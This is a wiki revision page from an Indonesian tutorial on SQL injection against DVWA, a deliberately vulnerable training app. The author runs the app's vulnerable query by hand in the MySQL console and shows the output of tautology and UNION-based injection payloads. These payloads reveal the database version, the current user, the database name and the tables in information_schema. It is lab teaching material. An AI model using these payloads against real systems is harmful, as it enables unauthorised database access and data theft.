Difference between revisions of "DVWA: perintah SQL di server DVWA"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 203: | Line 203: | ||
INFORMATION_SCHEMA adalah database informasi, yang menyimpan semua informasi | INFORMATION_SCHEMA adalah database informasi, yang menyimpan semua informasi | ||
tentang database yang di maintain oleh MySQL. | tentang database yang di maintain oleh MySQL. | ||
| + | |||
| + | Untuk mencek apakah ada tabel user di salah satu database, masukan perintah, | ||
| + | |||
| + | SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#'; | ||
| + | |||
| + | Akan keluar | ||
| + | |||
| + | +------------+-----------------------------------+ | ||
| + | | first_name | last_name | | ||
| + | +------------+-----------------------------------+ | ||
| + | | NULL | USER_PRIVILEGES | | ||
| + | | NULL | users | | ||
| + | | NULL | user | | ||
| + | | NULL | user_variables_by_thread | | ||
| + | | NULL | user_summary | | ||
| + | | NULL | user_summary_by_file_io | | ||
| + | | NULL | user_summary_by_file_io_type | | ||
| + | | NULL | user_summary_by_stages | | ||
| + | | NULL | user_summary_by_statement_latency | | ||
| + | | NULL | user_summary_by_statement_type | | ||
| + | +------------+-----------------------------------+ | ||
| + | 10 rows in set (0,00 sec) | ||
Revision as of 17:39, 11 March 2017
Pada saat kita berlatih SQL Injection menggunakan DVWA, akan lebih mudah untuk mengerti jika kita mengerti perintah SQL yang di berikan. Langkah untuk mempelajari ini tidak terlalu sulit
- Login ke mesin server yang kita instalasi DVWA
- menjadi super user, menggunakan perintah
sudo su
- Masuk ke database MySQL, jika password root mysql adalah 123456, maka kita dapat menggunakan perintah
mysql -u root -p123456
Jika berhasil dengan baik maka akan keluar
mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 4 Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu) Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql>
- Untuk berlatih kita perlu menggunakan database dvwa, ketik perintah
use dvwa
Kita sudah siap untuk belajar / memlihat apa yang terjadi jika kita latihan SQL Injection. Perintah yang diberikan di menu SQL Injection DVWA sebetulnya adalah
SELECT first_name, last_name FROM users WHERE user_ID = '$id';
Dimana '$id' adalah input parameter yang diberikan oleh user. Kita bisa bermain-main dengan ini di console mysql. Setelah kita 'use dvwa' maka kita bisa bermain-main dengan MySQL secara manual tanpa melakukan injection.
Masukan perintah
SELECT first_name, last_name FROM users WHERE user_ID = '1';
Keluar
+------------+-----------+ | first_name | last_name | +------------+-----------+ | admin | admin | +------------+-----------+ 1 row in set (0,00 sec)
Masukan perintah
SELECT first_name, last_name FROM users WHERE user_ID = '2';
Keluar
+------------+-----------+ | first_name | last_name | +------------+-----------+ | Gordon | Brown | +------------+-----------+ 1 row in set (0,00 sec)
Masukan perintah, untuk mencek apakah bisa di inject perintah lain
SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
Keluar
+------------+-----------+ | first_name | last_name | +------------+-----------+ | admin | admin | | Gordon | Brown | | Hack | Me | | Pablo | Picasso | | Bob | Smith | +------------+-----------+ 5 rows in set (0,00 sec)
Masukan perintah, untuk mencek apakah bisa di inject perintah lain
SELECT first_name, last_name FROM users WHERE user_ID = '1' or '2'='2';
Keluar
+------------+-----------+ | first_name | last_name | +------------+-----------+ | admin | admin | | Gordon | Brown | | Hack | Me | | Pablo | Picasso | | Bob | Smith | +------------+-----------+ 5 rows in set (0,01 sec)
Masukan perintah
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #;
Keluar
+------------+-------------------------+ | first_name | last_name | +------------+-------------------------+ | admin | admin | | Gordon | Brown | | Hack | Me | | Pablo | Picasso | | Bob | Smith | | NULL | 5.7.17-0ubuntu0.16.04.1 | +------------+-------------------------+ 6 rows in set (0,00 sec)
Akan keluar versi MySQL yang digunakan adalah 5.7.17-0ubuntu0.16.04.1
Masukan perintah,
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() #';
Keluar
+------------+----------------+ | first_name | last_name | +------------+----------------+ | admin | admin | | Gordon | Brown | | Hack | Me | | Pablo | Picasso | | Bob | Smith | | NULL | root@localhost | +------------+----------------+ 6 rows in set (0,00 sec)
akan keluar user yang digunakan untuk mengakses database, yaitu root@localhost
Masukan perintah
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() #';
Keluar
+------------+-----------+ | first_name | last_name | +------------+-----------+ | admin | admin | | Gordon | Brown | | Hack | Me | | Pablo | Picasso | | Bob | Smith | | NULL | dvwa | +------------+-----------+ 6 rows in set (0,00 sec)
akan keluar nama database yang digunakan, yaitu dvwa
Masukan perintah
SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, table_name from information_schema.tables #';
Keluar
+------------+------------------------------------------------------+ | first_name | last_name | +------------+------------------------------------------------------+ | NULL | CHARACTER_SETS | | NULL | COLLATIONS | | NULL | COLLATION_CHARACTER_SET_APPLICABILITY | | NULL | COLUMNS | .. .. .. | NULL | x$wait_classes_global_by_avg_latency | | NULL | x$wait_classes_global_by_latency | | NULL | x$waits_by_host_by_latency | | NULL | x$waits_by_user_by_latency | | NULL | x$waits_global_by_latency | +------------+------------------------------------------------------+ 275 rows in set (0,01 sec)
Dimana
- CHARACTER_SETS
- COLLATIONS
- COLLATION_CHARACTER_SET_APPLICABILITY
adalah INFORMATION SCHEMA table name. INFORMATION_SCHEMA adalah database informasi, yang menyimpan semua informasi tentang database yang di maintain oleh MySQL.
Untuk mencek apakah ada tabel user di salah satu database, masukan perintah,
SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#';
Akan keluar
+------------+-----------------------------------+ | first_name | last_name | +------------+-----------------------------------+ | NULL | USER_PRIVILEGES | | NULL | users | | NULL | user | | NULL | user_variables_by_thread | | NULL | user_summary | | NULL | user_summary_by_file_io | | NULL | user_summary_by_file_io_type | | NULL | user_summary_by_stages | | NULL | user_summary_by_statement_latency | | NULL | user_summary_by_statement_type | +------------+-----------------------------------+ 10 rows in set (0,00 sec)